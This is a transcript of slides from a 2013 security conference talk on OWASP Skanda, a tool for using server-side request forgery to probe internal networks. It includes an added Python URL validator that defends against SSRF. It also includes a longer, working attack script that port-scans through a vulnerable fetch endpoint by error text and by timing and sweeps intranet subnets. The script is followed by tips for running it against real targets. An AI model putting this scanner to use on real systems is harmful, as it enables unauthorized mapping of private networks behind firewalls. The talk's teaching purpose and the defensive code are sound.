c0c0n 2013 - owasp skanda
DESCRIPTION
Infiltrating the intranet using Skanda
TRANSCRIPT
HELLO SKANDA
Jayesh Singh Chauhan
@jayeshsch
ABOUT ME
• Author/Project Leader – OWASP Skanda
• Author of CSRF PoC Generator
• Pen Tester, Coder, B33rHead
• Snooker (crazy fan!!!)
Port Scan
• Nmap from the outside?
• Firewall/IDS in the way
• No gain
SSRF
• Web apps as the pivot
• Scan/attack from the inside
• Enumerate/attack internal services
SSRF
• A class of attack, not a single bug
• Reached through XXE, RFI, CRLF injection and similar
• If the server opens a socket on your behalf, it can be SSRFed
Normal Attack
SSRF Attack
What makes it possible
• HTTP client -> no protocol (scheme) check
• Invalid packets -> the service doesn't close the connection
• Protocols you can forge so that one fits inside another
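The first bullet is the one the server side can fix. The following is an added example written for this page (it is not Skanda code and not the speaker's): a check an HTTP-fetching feature should run before opening any socket. It restricts the scheme to http/https (so gopher://, dict://, file:// and friends never reach the client), refuses non-default ports so the fetcher cannot be used as a port scanner, resolves the host once and rejects loopback, private, link-local and IPv4-mapped addresses. The function name check_outbound_url and the port policy are assumptions for illustration.

```python
import ipaddress
import socket
import urllib.parse

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}   # policy assumed for the example


def resolve_all(host):
    """Every address the name resolves to; IP literals resolve to themselves."""
    try:
        return {ipaddress.ip_address(host)}
    except ValueError:
        pass
    infos = socket.getaddrinfo(host, None)
    return {ipaddress.ip_address(ai[4][0]) for ai in infos}


def is_internal(addr):
    """True for any address a server-side fetch must never reach."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped      # ::ffff:127.0.0.1 is still loopback
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


def check_outbound_url(url):
    """Return (ok, reason). ok is False when the fetch must not be attempted."""
    p = urllib.parse.urlsplit(url)
    if p.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {p.scheme!r} not allowed"
    if not p.hostname:
        return False, "no host"
    try:
        port = p.port
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addrs = resolve_all(p.hostname)
    except socket.gaierror:
        return False, "unresolvable host"
    for a in addrs:
        if is_internal(a):
            return False, f"{a} is not a public address"
    return True, "ok"
```

The check is only as good as its binding to the connection: connect to the address that was validated (and send the original Host header) rather than resolving the name a second time, otherwise DNS rebinding can swap in 127.0.0.1 between check and connect; and run the check again on every redirect the client follows.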
Let’s dive into Skanda
• Port Scan
• Network Discovery
XSPA/SSRF
• Error-based XSPA
• Blind XSPA
• Closed port
DEMO
• Port Scanning using Skanda
Intranet
Intranet Discovery
• Router -> first IP of the subnet
• Check whether any router answers
• If a router is found: enter the subnet
• Analyze every node's response
DEMO
• Network Discovery using Skanda
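An added example, written for this page rather than taken from Skanda, that puts the two demos together: error-based and blind XSPA port scanning through an SSRF endpoint, and the router-first intranet discovery from the slide above. The endpoint http://target.example/fetch?url= and the leaked error strings (worded after common PHP/curl messages) are assumptions; FAKE_NET is a constructed stand-in for the vulnerable server so the code runs offline, and fetch_via_ssrf is what you would pass instead against a real target.

```python
import re
import time
import urllib.error
import urllib.parse
import urllib.request

# Hypothetical vulnerable endpoint (assumption): the server fetches whatever
# ?url= names and returns the body, or its HTTP client's error message.
SSRF_ENDPOINT = "http://target.example/fetch?url="

# Error-based XSPA lives on leaked client error text; patterns are assumed.
REFUSED = re.compile(r"connection refused|econnrefused", re.I)
TIMEOUT = re.compile(r"timed out|timeout", re.I)
# Banners non-HTTP services send before reading anything (SSH, SMTP/FTP, POP3).
BANNER = re.compile(r"(SSH-\d\.\d[^\r\n]*|220[ -][^\r\n]*|\+OK[^\r\n]*)")


def fetch_via_ssrf(url, timeout=30.0):
    """Make the vulnerable server fetch url; return (body, seconds elapsed).
    timeout must exceed the server's own client timeout or blind timing is lost."""
    req = SSRF_ENDPOINT + urllib.parse.quote(url, safe="")
    t0 = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:        # 4xx/5xx bodies often carry the error
        body = e.read().decode("utf-8", "replace")
    except urllib.error.URLError as e:
        body = str(e.reason)
    return body, time.monotonic() - t0


def classify_error_based(body):
    """Error-based XSPA: read the port state out of the leaked message."""
    if REFUSED.search(body):
        return "closed", None                  # RST came back: host up, port closed
    if TIMEOUT.search(body):
        return "filtered", None                # dropped by a firewall, or no host
    m = BANNER.search(body)
    return "open", (m.group(1).strip() if m else None)


def classify_blind(elapsed, refused_rtt, client_timeout):
    """Blind XSPA: no error text, only timing. A refused connection returns in
    about one RTT, a filtered port burns the whole client timeout, an open
    non-HTTP service usually lands in between. Heuristic thresholds: calibrate
    refused_rtt against a port you know is closed."""
    if elapsed <= refused_rtt * 3:
        return "closed"
    if elapsed >= client_timeout * 0.9:
        return "filtered"
    return "open"


def scan_ports(host, ports, fetch=fetch_via_ssrf, blind=False,
               refused_rtt=0.05, client_timeout=10.0):
    """port -> (state, banner). Error-based by default, timing-only if blind."""
    results = {}
    for port in ports:
        body, elapsed = fetch(f"http://{host}:{port}/")
        if blind:
            results[port] = (classify_blind(elapsed, refused_rtt, client_timeout), None)
        else:
            results[port] = classify_error_based(body)
    return results


def discover_intranet(candidate_subnets, fetch=fetch_via_ssrf, probe_port=80):
    """Router-first discovery: probe .1 of each candidate /24; only if it answers
    at all (open or refused) sweep the subnet and record each node's response."""
    live = {}
    for subnet in candidate_subnets:          # e.g. "192.168.1" for 192.168.1.0/24
        gw_state, _ = classify_error_based(fetch(f"http://{subnet}.1:{probe_port}/")[0])
        if gw_state == "filtered":
            continue                           # nothing routes there; skip the /24
        for host in range(1, 255):
            ip = f"{subnet}.{host}"
            state, banner = classify_error_based(fetch(f"http://{ip}:{probe_port}/")[0])
            if state != "filtered":
                live[ip] = (state, banner)
    return live


# Constructed stand-in for the vulnerable server so the example runs offline:
# "host:port" -> (what the server would echo back, seconds it would take).
FAKE_NET = {
    "192.168.1.1:80": ("<html><title>Router login</title></html>", 0.2),
    "192.168.1.1:22": ("SSH-2.0-OpenSSH_6.2\r\n", 0.4),
    "192.168.1.1:23": ("Failed to connect to 192.168.1.1 port 23: Connection refused", 0.05),
    "192.168.1.5:80": ("failed to open stream: Connection refused", 0.05),
    "192.168.1.7:80": ("<html>Printer status</html>", 0.2),
}
UNREACHABLE = ("Operation timed out after 10000 milliseconds", 10.0)


def fake_fetch(url, timeout=30.0):
    p = urllib.parse.urlsplit(url)
    return FAKE_NET.get(f"{p.hostname}:{p.port}", UNREACHABLE)


if __name__ == "__main__":
    print(scan_ports("192.168.1.1", [22, 23, 80, 443], fetch=fake_fetch))
    print(scan_ports("192.168.1.1", [22, 23, 80, 443], fetch=fake_fetch, blind=True))
    print(discover_intranet(["10.0.0", "192.168.1"], fetch=fake_fetch))
```

Against a real target the 254 probes per subnet go through the application's own client, so the app's read timeout sets the pace and a "filtered" result for a whole /24 is the signal to move to the next candidate range; a "closed" answer from the gateway address is still a hit, because the refusal proves something is routing there.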
Q & A?
Got 'em? Ask 'em?
Special Thanks to..
• Lavakumar Kuppan, @lavakumark
• Riyaz Walikar, @riyazwalikar
• Ajith Chandran, @r3dsm0k3
• ONsec Lab, @Onsec_lab